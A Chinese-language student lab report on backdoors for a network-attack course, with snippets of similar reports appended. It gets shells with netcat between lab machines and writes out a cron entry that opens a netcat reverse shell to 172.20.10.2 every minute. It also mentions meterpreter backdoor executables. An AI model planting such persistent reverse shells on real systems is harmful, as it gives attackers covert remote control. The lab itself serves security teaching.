1.使用netcat獲取主機操作shell
(1)windows獲取linux的shell
windows在cmd下使用ipconfig命令檢視win的ip位址為10.43.33.60
linux在終端下使用ifconfig命令檢視linux的ip位址為10.43.33.116
windows使用c:\你的nc的目錄路徑》ncat.exe -l -p 5302
命令於5302埠進行監聽。在此,我直接進入到nc的目錄下執行的程式。
在使用nc的命令時,防火牆會詢問主機是否可以訪問,直接允許即可。
windows主機傳送nihao
linux無法找到執行該命令
(2)linux獲取windows的shell
(3)cron啟動
與vi的用法一樣,使用i
鍵修改檔案為* * * * * /bin/netcat 172.20.10.2 5302 -e /bin/sh
,意在使linux每分鐘自動執行指令,**至pc端的5302埠.退出插入模式後儲存退出即可。
隨後,我們可以使用crontab -l
檢視cron修改後的內容:
我們在windows主機下的5302埠進行監聽,每分鐘我們就可以獲取乙個shell
2.使用socat獲取主機操作shell, 任務計畫啟動
(1)以linux利用socat獲取windows的shell為例
(2)任務計畫啟動
對此,我上網尋求解決的方法,只能找到如下內容:
根本看不懂啊兄弟……很難受
3.使用msf meterpreter生成可執行檔案,利用ncat傳送檔案到主機並執行獲取主機shell
開啟msf監聽程序
在msf開啟監聽之後,在win下執行我們剛剛的後門程式fool3.exe,linux就可以獲得win的shell,進行遠端控制了。
4.meterpreter資訊提取與提權
例舉你能想到的乙個後門進入到你系統中的可能方式?
例舉你知道的後門如何啟動起來(win及linux)的方式?
meterpreter有哪些給你映像深刻的功能?
如何發現自己有系統有沒有被安裝後門?
20145328 《網路對抗技術》後門原理與實踐
1.使用netcat獲取主機操作shell,cron啟動 2.使用socat獲取主機操作shell,任務計畫啟動 3.使用msf meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機shell 4.使用msf meterpreter生成獲取目標主機音訊 攝像頭 擊鍵...
20145315何佳蕾《網路對抗》 後門原理與實踐
我下過很多盜版軟體的破解版,而且給了他們執行許可權,感覺真的到處都很危險。win獲得linuxshell 在防火牆裡設定允許ncat執行,開啟監聽,然後獲取shell windows ip位址如下 linux ip位址如下 linux獲得winshell 使用cron設定自動執行 linux獲取wi...
20145204《網路對抗》MAL後門原理與實踐
1 使用netcat獲取主機操作shell,cron啟動 1分 2 使用socat獲取主機操作shell,任務計畫啟動 1分 3 使用msf meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機shell 1分 4 使用msf meterpreter生成獲取目標主機...